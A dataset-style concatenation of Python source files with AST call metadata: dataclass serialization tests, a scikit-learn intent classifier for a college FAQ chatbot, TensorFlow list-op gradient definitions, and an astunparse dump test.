should_be = DataClass(x=datetime(2008, 12, 29, 7, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2009-W01 0700"})
assert instance == should_be
def test_pendulum_date_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: date = field(metadata={"deserialize": "pendulum"})
should_be = DataClass(x=date(2008, 12, 29))
instance = DataClass.from_dict({"x": "2009-W01"})
assert instance == should_be
def test_pendulum_time_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: time = field(metadata={"deserialize": "pendulum"})
should_be = DataClass(x=time(3, 4, 5))
instance = DataClass.from_dict({"x": "2009-W01 030405"})
assert instance == should_be
def test_unsupported_datetime_parser_engine():
with pytest.raises(UnserializableField):
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "unsupported"})
def test_global_function_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"deserialize": ciso8601.parse_datetime_as_naive}
)
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05+03:00"})
assert instance == should_be
def test_local_function_datetime_parser():
def parse_dt(s):
return ciso8601.parse_datetime_as_naive(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": parse_dt})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05+03:00"})
assert instance == should_be
def test_class_method_datetime_parser():
class DateTimeParser:
@classmethod
def parse_dt(cls, s: str) -> datetime:
return datetime.fromisoformat(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": DateTimeParser.parse_dt})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05"})
assert instance == should_be
def test_class_instance_method_datetime_parser():
class DateTimeParser:
def __call__(self, s: str) -> datetime:
return datetime.fromisoformat(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": DateTimeParser()})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05"})
assert instance == should_be
def test_callable_class_instance_datetime_parser():
class CallableDateTimeParser:
def __call__(self, s):
return ciso8601.parse_datetime(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": CallableDateTimeParser()})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_lambda_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"deserialize": lambda s: ciso8601.parse_datetime(s)}
)
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_derived_dataclass_metadata_deserialize_option():
@dataclass
class A:
x: datetime = field(metadata={"deserialize": ciso8601.parse_datetime})
@dataclass
class B(A, DataClassDictMixin):
y: datetime = field(metadata={"deserialize": ciso8601.parse_datetime})
should_be = B(
x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
y=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
)
instance = B.from_dict(
{"x": "2021-01-02T03:04:05Z", "y": "2021-01-02T03:04:05Z"}
)
assert instance == should_be
def test_bytearray_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: bytearray = field(
metadata={"deserialize": lambda s: s.upper().encode()}
)
should_be = DataClass(x=bytearray(b"ABC"))
instance = DataClass.from_dict({"x": "abc"})
assert instance == should_be
def test_path_like_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Path = field(
metadata={"deserialize": lambda s: Path(str(s).upper())}
)
should_be = DataClass(x=Path("/ABC"))
instance = DataClass.from_dict({"x": "/abc"})
assert instance == should_be
def test_datetime_serialize_option():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"serialize": lambda v: v.strftime("%Y-%m-%d %H:%M:%S")}
)
should_be = {"x": "2021-01-02 03:04:05"}
instance = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
assert instance.to_dict() == should_be
def test_third_party_type_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: ThirdPartyType = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
should_be = DataClass(x=ThirdPartyType(123))
instance = DataClass.from_dict({"x": 123})
assert instance == should_be
assert instance.to_dict() == {"x": 123}
def test_serializable_type_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: MutableString = field(
metadata={
"deserialize": lambda s: MutableString(s.upper()),
"serialize": lambda v: str(v).lower(),
}
)
should_be = DataClass(x=MutableString("ABC"))
instance = DataClass.from_dict({"x": "abc"})
assert instance == should_be
assert instance.to_dict() == {"x": "abc"}
def test_optional_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Optional[ThirdPartyType] = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
instance = DataClass.from_dict({"x": 123})
assert instance
assert instance.x.value == 123
dct = instance.to_dict()
assert dct["x"] == 123
def test_union_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Union[int, str, float, ThirdPartyType] = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
instance = DataClass.from_dict({"x": 1})
assert instance == DataClass(x=ThirdPartyType(value=1))
assert instance.to_dict() == {"x": 1}
def test_serialization_strategy():
class TestSerializationStrategy(SerializationStrategy):
def serialize(self, value):
return [value]
def deserialize(self, value):
return value[0]
@dataclass
class DataClass(DataClassDictMixin):
x: int = field(
metadata={"serialization_strategy": TestSerializationStrategy()}
)
instance = DataClass(x=123)
assert DataClass.from_dict({"x": [123]}) == instance
assert instance.to_dict() == {"x": [123]}
def test_collection_derived_custom_class():
@dataclass
class DataClass(DataClassDictMixin):
x: MyList = field(
metadata={"serialize": lambda v: v, "deserialize": lambda v: v}
)
instance = DataClass(x=[1, 2, 3])
assert DataClass.from_dict({"x": [1, 2, 3]}) == instance
assert instance.to_dict() == {"x": [1, 2, 3]}
def test_dataclass_with_typed_dict_overridden():
def serialize_x(x: TypedDictRequiredKeys) -> Dict[str, Any]:
return {"int": int(x["int"]), "float": float(x["float"])}
def deserialize_x(x: Dict[str, Any]) -> TypedDictRequiredKeys:
return TypedDictRequiredKeys(int=x["int"], float=x["float"])
@dataclass
class DataClass(DataClassDictMixin):
x: TypedDictRequiredKeys = field(
metadata={"serialize": serialize_x, "deserialize": deserialize_x}
)
obj = DataClass(x=TypedDictRequiredKeys(int=1, float=2.0))
data = {"x": {"int": 1, "float": 2.0}}
assert DataClass.from_dict(data) == obj
assert obj.to_dict() == data
| [((24, 22, 24, 65), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((34, 18, 34, 61), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((44, 18, 44, 61), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((54, 22, 54, 65), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((64, 18, 64, 61), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((74, 18, 74, 61), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((82, 9, 82, 43), 'pytest.raises', 'pytest.raises', ({(82, 23, 82, 42): 'UnserializableField'}, {}), '(UnserializableField)', False, 'import pytest\n'), ((92, 22, 94, 9), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((103, 15, 103, 50), 'ciso8601.parse_datetime_as_naive', 'ciso8601.parse_datetime_as_naive', ({(103, 48, 103, 49): 's'}, {}), '(s)', False, 'import ciso8601\n'), ((107, 22, 107, 63), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((122, 22, 122, 78), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((172, 22, 172, 78), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((176, 22, 176, 78), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((310, 20, 312, 9), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((328, 35, 330, 9), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((26, 28, 26, 78), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((36, 28, 36, 44), 'datetime.date', 'date', ({(36, 33, 36, 37): '2021', (36, 39, 36, 40): '1', (36, 42, 36, 43): '2'}, {}), '(2021, 1, 2)', False, 'from datetime import date, datetime, time, timezone\n'), ((46, 28, 46, 41), 'datetime.time', 'time', ({(46, 33, 46, 34): '3', (46, 36, 46, 37): '4', (46, 39, 46, 40): '5'}, {}), '(3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((56, 28, 56, 74), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((66, 28, 66, 46), 'datetime.date', 'date', ({(66, 33, 66, 37): '2008', (66, 39, 66, 41): '12', (66, 43, 66, 45): '29'}, {}), '(2008, 12, 29)', False, 'from datetime import date, datetime, time, timezone\n'), ((76, 28, 76, 41), 'datetime.time', 'time', ({(76, 33, 76, 34): '3', (76, 36, 76, 37): '4', (76, 39, 76, 40): '5'}, {}), '(3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((86, 26, 86, 72), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((96, 28, 96, 57), 'datetime.datetime', 'datetime', ({(96, 37, 96, 41): '2021', (96, 43, 96, 44): '1', (96, 46, 96, 47): '2', (96, 49, 96, 50): '3', (96, 52, 96, 53): '4', (96, 55, 96, 56): '5'}, {}), '(2021, 1, 2, 3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((109, 28, 109, 57), 'datetime.datetime', 'datetime', ({(109, 37, 109, 41): '2021', (109, 43, 109, 44): '1', (109, 46, 109, 47): '2', (109, 49, 109, 50): '3', (109, 52, 109, 53): '4', (109, 55, 109, 56): '5'}, {}), '(2021, 1, 2, 3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((118, 19, 118, 44), 'datetime.datetime.fromisoformat', 'datetime.fromisoformat', ({(118, 42, 118, 43): 's'}, {}), '(s)', False, 'from datetime import date, datetime, time, timezone\n'), ((124, 28, 124, 57), 'datetime.datetime', 'datetime', ({(124, 37, 124, 41): '2021', (124, 43, 124, 44): '1', (124, 46, 124, 47): '2', (124, 49, 124, 50): '3', (124, 52, 124, 53): '4', (124, 55, 124, 56): '5'}, {}), '(2021, 1, 2, 3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((132, 19, 132, 44), 'datetime.datetime.fromisoformat', 'datetime.fromisoformat', ({(132, 42, 132, 43): 's'}, {}), '(s)', False, 'from datetime import date, datetime, time, timezone\n'), ((138, 28, 138, 57), 'datetime.datetime', 'datetime', ({(138, 37, 138, 41): '2021', (138, 43, 138, 44): '1', (138, 46, 138, 47): '2', (138, 49, 138, 50): '3', (138, 52, 138, 53): '4', (138, 55, 138, 56): '5'}, {}), '(2021, 1, 2, 3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((146, 19, 146, 45), 'ciso8601.parse_datetime', 'ciso8601.parse_datetime', ({(146, 43, 146, 44): 's'}, {}), '(s)', False, 'import ciso8601\n'), ((152, 28, 152, 78), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((164, 28, 164, 78), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((179, 10, 179, 60), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((180, 10, 180, 60), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((207, 28, 207, 40), 'pathlib.Path', 'Path', ({(207, 33, 207, 39): '"""/ABC"""'}, {}), "('/ABC')", False, 'from pathlib import Path\n'), ((220, 27, 220, 77), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((161, 47, 161, 73), 'ciso8601.parse_datetime', 'ciso8601.parse_datetime', ({(161, 71, 161, 72): 's'}, {}), '(s)', False, 'import ciso8601\n')] |
yashrajt/college_FAQ-chatbot | Intent model/Intent_model.py | b3a2a1b4958068b652d019c13f31f6329b093c0a | import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.metrics import accuracy_score, confusion_matrix
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.pipeline import Pipeline
from sklearn.metrics import classification_report
from sklearn.linear_model import SGDClassifier
from nltk import word_tokenize
import nltk
#nltk.download('punkt')
import re
import joblib
def train_intent():
df = pd.read_csv("Training Data/intent_training_data.csv")
df.head
question = df["QUESTIONS"]
intent = df["INTENT"]
def preprocess(data):
data = data.lower()
# stop_words =['hers', 'between', 'yourself', 'but', 'again', 'there', 'about', 'once', 'during', 'out', 'very', 'having', 'with', 'they', 'own', 'an', 'be', 'some', 'for', 'do', 'its', 'yours', 'such', 'into', 'of', 'most', 'itself', 'other', 'off', 'is', 's', 'am', 'or', 'who', 'as', 'from', 'him', 'each', 'the', 'themselves', 'until', 'below', 'are', 'we', 'these', 'your', 'his', 'don', 'nor', 'me', 'were', 'her', 'more', 'himself', 'this', 'down', 'should', 'our', 'their', 'while', 'above', 'both', 'up', 'to', 'ours', 'had', 'she', 'all', 'no', 'when', 'at', 'any', 'before', 'them', 'same', 'and', 'been', 'have', 'in', 'will', 'on', 'does', 'yourselves', 'then', 'that', 'because', 'what', 'over', 'why', 'so', 'can', 'did', 'not', 'now', 'under', 'he', 'you', 'herself', 'has', 'just', 'where', 'too', 'only', 'myself', 'which', 'those', 'i', 'after', 'few', 'whom', 't', 'being', 'if', 'theirs', 'my', 'against', 'a', 'by', 'doing', 'it', 'how', 'further', 'was', 'here', 'than']
# word_tokens = word_tokenize(data)
# data = [w for w in word_tokens if not w in stop_words]
# for w in word_tokens:
# if w not in stop_words:
# data.append(w)
# data = " ".join(data)
data = re.sub(r'[^a-zA-Z0-9]', " ", data)
return data
question = question.apply(preprocess)
X = question
y = intent
my_tags = list(set(intent))
#print(my_tags)
#X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state = 0)
sgd = Pipeline([('vect', CountVectorizer()),
('tfidf', TfidfTransformer()),
#('tfidf',TfidfVectorizer()),
#("svc", svm.SVC(decision_function_shape='ovo')),
('clf', SGDClassifier(loss='log', penalty='l2',alpha=1e-3, random_state=10, max_iter=10, tol=None)),
])
sgd.fit(X, y)
#y_pred = sgd.predict(X_test)
#t = sgd.predict_proba(["of electronics department"])
#print(t)
#print(sgd.predict(["what is the eligblity crieteria for addmisson in somaiya "]))
#print('accuracy %s' % accuracy_score(y_pred, y_test))
joblib.dump(sgd, 'intent_model_1.joblib')
#print(classification_report(y_test, y_pred,target_names=my_tags))
#train_intent()
'''
calender = 0
faculty =1
infra = 2
placement = 4
result = 5
small_talk = 6
student body = 7
syllabus = 8
'''
| [((18, 9, 18, 62), 'pandas.read_csv', 'pd.read_csv', ({(18, 21, 18, 61): '"""Training Data/intent_training_data.csv"""'}, {}), "('Training Data/intent_training_data.csv')", True, 'import pandas as pd\n'), ((59, 4, 59, 45), 'joblib.dump', 'joblib.dump', ({(59, 16, 59, 19): 'sgd', (59, 21, 59, 44): '"""intent_model_1.joblib"""'}, {}), "(sgd, 'intent_model_1.joblib')", False, 'import joblib\n'), ((34, 15, 34, 49), 're.sub', 're.sub', ({(34, 22, 34, 37): '"""[^a-zA-Z0-9]"""', (34, 39, 34, 42): '""" """', (34, 44, 34, 48): 'data'}, {}), "('[^a-zA-Z0-9]', ' ', data)", False, 'import re\n'), ((44, 29, 44, 46), 'sklearn.feature_extraction.text.CountVectorizer', 'CountVectorizer', ({}, {}), '()', False, 'from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n'), ((45, 30, 45, 48), 'sklearn.feature_extraction.text.TfidfTransformer', 'TfidfTransformer', ({}, {}), '()', False, 'from sklearn.feature_extraction.text import TfidfTransformer\n'), ((48, 28, 48, 118), 'sklearn.linear_model.SGDClassifier', 'SGDClassifier', (), '', False, 'from sklearn.linear_model import SGDClassifier\n')] |
owennewo/kfserving | vendor/github.com/tensorflow/tensorflow/tensorflow/python/ops/list_ops.py | 89f73c87525b8e06ea799f69f2979c4ad272fcb3 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops to manipulate lists of tensors."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_list_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_list_ops import *
# pylint: enable=wildcard-import
ops.NotDifferentiable("TensorListConcatLists")
ops.NotDifferentiable("TensorListElementShape")
ops.NotDifferentiable("TensorListLength")
ops.NotDifferentiable("TensorListPushBackBatch")
def empty_tensor_list(element_shape,
element_dtype,
max_num_elements=None,
name=None):
if max_num_elements is None:
max_num_elements = -1
return gen_list_ops.empty_tensor_list(
element_shape=_build_element_shape(element_shape),
element_dtype=element_dtype,
max_num_elements=max_num_elements,
name=name)
def tensor_list_reserve(element_shape, num_elements, element_dtype, name=None):
return gen_list_ops.tensor_list_reserve(
element_shape=_build_element_shape(element_shape),
num_elements=num_elements,
element_dtype=element_dtype,
name=name)
def tensor_list_from_tensor(tensor, element_shape, name=None):
return gen_list_ops.tensor_list_from_tensor(
tensor=tensor,
element_shape=_build_element_shape(element_shape),
name=name)
def tensor_list_concat(input_handle, element_dtype, name=None):
# Ignore the lengths output of TensorListConcat. It is only used during
# gradient computation.
return gen_list_ops.tensor_list_concat(
input_handle=input_handle, element_dtype=element_dtype, name=name)[0]
def tensor_list_split(tensor, element_shape, lengths, name=None):
return gen_list_ops.tensor_list_split(
tensor=tensor,
element_shape=_build_element_shape(element_shape),
lengths=lengths,
name=name)
@ops.RegisterGradient("TensorListPushBack")
def _PushBackGrad(op, dresult):
return gen_list_ops.tensor_list_pop_back(
dresult, element_dtype=op.get_attr("element_dtype"))
@ops.RegisterGradient("TensorListPopBack")
def _PopBackGrad(op, dlist, delement):
if dlist is None:
dlist = empty_tensor_list(
element_dtype=delement.dtype,
element_shape=gen_list_ops.tensor_list_element_shape(
op.outputs[0], shape_type=dtypes.int32))
return gen_list_ops.tensor_list_push_back(dlist, delement)
@ops.RegisterGradient("TensorListStack")
def _TensorListStackGrad(unused_op, dtensor):
return tensor_list_from_tensor(dtensor, element_shape=dtensor.shape[1:])
@ops.RegisterGradient("TensorListConcat")
def _TensorListConcatGrad(op, dtensor, unused_dlengths):
# TODO(srbs): We lose the element_shape information in tensor_list_concat.
# Consider providing that as an output of TensorListConcat?
if dtensor.shape.rank is None:
element_shape = None
else:
element_shape = [None] + dtensor.shape.as_list()[1:]
return tensor_list_split(
dtensor,
element_shape=_build_element_shape(element_shape),
lengths=op.outputs[1])
@ops.RegisterGradient("TensorListSplit")
def _TensorListSplitGrad(op, dlist):
return tensor_list_concat(dlist, element_dtype=op.inputs[0].dtype), None, None
@ops.RegisterGradient("TensorListFromTensor")
def _TensorListFromTensorGrad(op, dlist):
"""Gradient for TensorListFromTensor."""
if op.inputs[0].shape.dims and op.inputs[0].shape.dims[0].value is not None:
num_elements = op.inputs[0].shape.dims[0].value
else:
num_elements = None
if dlist is None:
dlist = empty_tensor_list(
element_dtype=op.inputs[0].dtype,
element_shape=gen_list_ops.tensor_list_element_shape(
op.outputs[0], shape_type=dtypes.int32))
tensor_grad = gen_list_ops.tensor_list_stack(
dlist, element_dtype=op.inputs[0].dtype, num_elements=num_elements)
shape_grad = None
return tensor_grad, shape_grad
@ops.RegisterGradient("TensorListGetItem")
def _TensorListGetItemGrad(op, ditem):
"""Gradient for TensorListGetItem."""
list_size = gen_list_ops.tensor_list_length(op.inputs[0])
list_grad = gen_list_ops.tensor_list_set_item(
gen_list_ops.tensor_list_reserve(
gen_list_ops.tensor_list_element_shape(op.inputs[0],
shape_type=dtypes.int32),
list_size, element_dtype=ditem.dtype),
index=op.inputs[1],
item=ditem)
index_grad = None
return list_grad, index_grad
@ops.RegisterGradient("TensorListSetItem")
def _TensorListSetItemGrad(op, dlist):
_, index, item = op.inputs
list_grad = gen_list_ops.tensor_list_set_item(
dlist, index=index, item=array_ops.zeros_like(item))
index_grad = None
element_grad = gen_list_ops.tensor_list_get_item(
dlist, index, element_dtype=item.dtype)
return list_grad, index_grad, element_grad
@ops.RegisterGradient("TensorListGather")
def _TensorListGatherGrad(op, dtensor):
_, indices = op.inputs
return gen_list_ops.tensor_list_scatter(
tensor=dtensor, indices=indices,
element_shape=ops.convert_to_tensor(-1, dtype=dtypes.int32)), None
@ops.RegisterGradient("TensorListScatter")
def _TensorListScatterGrad(op, dlist):
t, indices, _ = op.inputs
return gen_list_ops.tensor_list_gather(
dlist, indices, element_dtype=t.dtype), None
def _build_element_shape(shape):
"""Converts shape to a format understood by list_ops for element_shape.
If `shape` is already a `Tensor` it is returned as-is. We do not perform a
type check here.
If shape is None or a TensorShape with unknown rank, -1 is returned.
If shape is a scalar, an int32 tensor with empty list is returned. Note we
do directly return an empty list since ops.convert_to_tensor would conver it
to a float32 which is not a valid type for element_shape.
If shape is a sequence of dims, None's in the list are replaced with -1. We
do not check the dtype of the other dims.
Args:
shape: Could be None, Tensor, TensorShape or a list of dims (each dim could
be a None, scalar or Tensor).
Returns:
A None-free shape that can be converted to a tensor.
"""
if isinstance(shape, ops.Tensor):
return shape
if isinstance(shape, tensor_shape.TensorShape):
# `TensorShape.as_list` requires rank to be known.
shape = shape.as_list() if shape else None
# Shape is unknown.
if shape is None:
return -1
# Shape is a scalar.
if not shape:
return ops.convert_to_tensor(shape, dtype=dtypes.int32)
# Shape is a sequence of dimensions. Convert None dims to -1.
return [d if d is not None else -1 for d in shape]
| [((33, 0, 33, 46), 'tensorflow.python.framework.ops.NotDifferentiable', 'ops.NotDifferentiable', ({(33, 22, 33, 45): '"""TensorListConcatLists"""'}, {}), "('TensorListConcatLists')", False, 'from tensorflow.python.framework import ops\n'), ((34, 0, 34, 47), 'tensorflow.python.framework.ops.NotDifferentiable', 'ops.NotDifferentiable', ({(34, 22, 34, 46): '"""TensorListElementShape"""'}, {}), "('TensorListElementShape')", False, 'from tensorflow.python.framework import ops\n'), ((35, 0, 35, 41), 'tensorflow.python.framework.ops.NotDifferentiable', 'ops.NotDifferentiable', ({(35, 22, 35, 40): '"""TensorListLength"""'}, {}), "('TensorListLength')", False, 'from tensorflow.python.framework import ops\n'), ((36, 0, 36, 48), 'tensorflow.python.framework.ops.NotDifferentiable', 'ops.NotDifferentiable', ({(36, 22, 36, 47): '"""TensorListPushBackBatch"""'}, {}), "('TensorListPushBackBatch')", False, 'from tensorflow.python.framework import ops\n'), ((83, 1, 83, 43), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(83, 22, 83, 42): '"""TensorListPushBack"""'}, {}), "('TensorListPushBack')", False, 'from tensorflow.python.framework import ops\n'), ((89, 1, 89, 42), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(89, 22, 89, 41): '"""TensorListPopBack"""'}, {}), "('TensorListPopBack')", False, 'from tensorflow.python.framework import ops\n'), ((99, 1, 99, 40), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(99, 22, 99, 39): '"""TensorListStack"""'}, {}), "('TensorListStack')", False, 'from tensorflow.python.framework import ops\n'), ((104, 1, 104, 41), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(104, 22, 104, 40): '"""TensorListConcat"""'}, {}), "('TensorListConcat')", False, 'from tensorflow.python.framework import ops\n'), ((118, 1, 118, 40), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(118, 22, 118, 39): '"""TensorListSplit"""'}, {}), "('TensorListSplit')", False, 'from tensorflow.python.framework import ops\n'), ((123, 1, 123, 45), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(123, 22, 123, 44): '"""TensorListFromTensor"""'}, {}), "('TensorListFromTensor')", False, 'from tensorflow.python.framework import ops\n'), ((141, 1, 141, 42), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(141, 22, 141, 41): '"""TensorListGetItem"""'}, {}), "('TensorListGetItem')", False, 'from tensorflow.python.framework import ops\n'), ((156, 1, 156, 42), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(156, 22, 156, 41): '"""TensorListSetItem"""'}, {}), "('TensorListSetItem')", False, 'from tensorflow.python.framework import ops\n'), ((167, 1, 167, 41), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(167, 22, 167, 40): '"""TensorListGather"""'}, {}), "('TensorListGather')", False, 'from tensorflow.python.framework import ops\n'), ((175, 1, 175, 42), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(175, 22, 175, 41): '"""TensorListScatter"""'}, {}), "('TensorListScatter')", False, 'from tensorflow.python.framework import ops\n'), ((96, 9, 96, 60), 'tensorflow.python.ops.gen_list_ops.tensor_list_push_back', 'gen_list_ops.tensor_list_push_back', ({(96, 44, 96, 49): 'dlist', (96, 51, 96, 59): 'delement'}, {}), '(dlist, delement)', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((135, 16, 136, 73), 'tensorflow.python.ops.gen_list_ops.tensor_list_stack', 'gen_list_ops.tensor_list_stack', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((144, 14, 144, 59), 'tensorflow.python.ops.gen_list_ops.tensor_list_length', 'gen_list_ops.tensor_list_length', ({(144, 46, 144, 58): 'op.inputs[0]'}, {}), '(op.inputs[0])', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((162, 17, 163, 45), 'tensorflow.python.ops.gen_list_ops.tensor_list_get_item', 'gen_list_ops.tensor_list_get_item', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((71, 9, 72, 72), 'tensorflow.python.ops.gen_list_ops.tensor_list_concat', 'gen_list_ops.tensor_list_concat', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((178, 9, 179, 44), 'tensorflow.python.ops.gen_list_ops.tensor_list_gather', 'gen_list_ops.tensor_list_gather', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((214, 11, 214, 59), 'tensorflow.python.framework.ops.convert_to_tensor', 'ops.convert_to_tensor', (), '', False, 'from tensorflow.python.framework import ops\n'), ((147, 10, 148, 73), 'tensorflow.python.ops.gen_list_ops.tensor_list_element_shape', 'gen_list_ops.tensor_list_element_shape', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((160, 31, 160, 57), 'tensorflow.python.ops.array_ops.zeros_like', 'array_ops.zeros_like', ({(160, 52, 160, 56): 'item'}, {}), '(item)', False, 'from tensorflow.python.ops import array_ops\n'), ((94, 22, 95, 51), 'tensorflow.python.ops.gen_list_ops.tensor_list_element_shape', 'gen_list_ops.tensor_list_element_shape', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((133, 22, 134, 51), 'tensorflow.python.ops.gen_list_ops.tensor_list_element_shape', 'gen_list_ops.tensor_list_element_shape', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((172, 20, 172, 65), 'tensorflow.python.framework.ops.convert_to_tensor', 'ops.convert_to_tensor', (), '', False, 'from tensorflow.python.framework import ops\n')] |
flaeppe/astunparse | tests/test_dump.py | 754ec7d113fa273625ccc7b6c5d65aa7700ab8a9 | import ast
import re
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import astunparse
from tests.common import AstunparseCommonTestCase
class DumpTestCase(AstunparseCommonTestCase, unittest.TestCase):
def assertASTEqual(self, dump1, dump2):
# undo the pretty-printing
dump1 = re.sub(r"(?<=[\(\[])\n\s+", "", dump1)
dump1 = re.sub(r"\n\s+", " ", dump1)
self.assertEqual(dump1, dump2)
def check_roundtrip(self, code1, filename="internal", mode="exec"):
ast_ = compile(str(code1), filename, mode, ast.PyCF_ONLY_AST)
dump1 = astunparse.dump(ast_)
dump2 = ast.dump(ast_)
self.assertASTEqual(dump1, dump2)
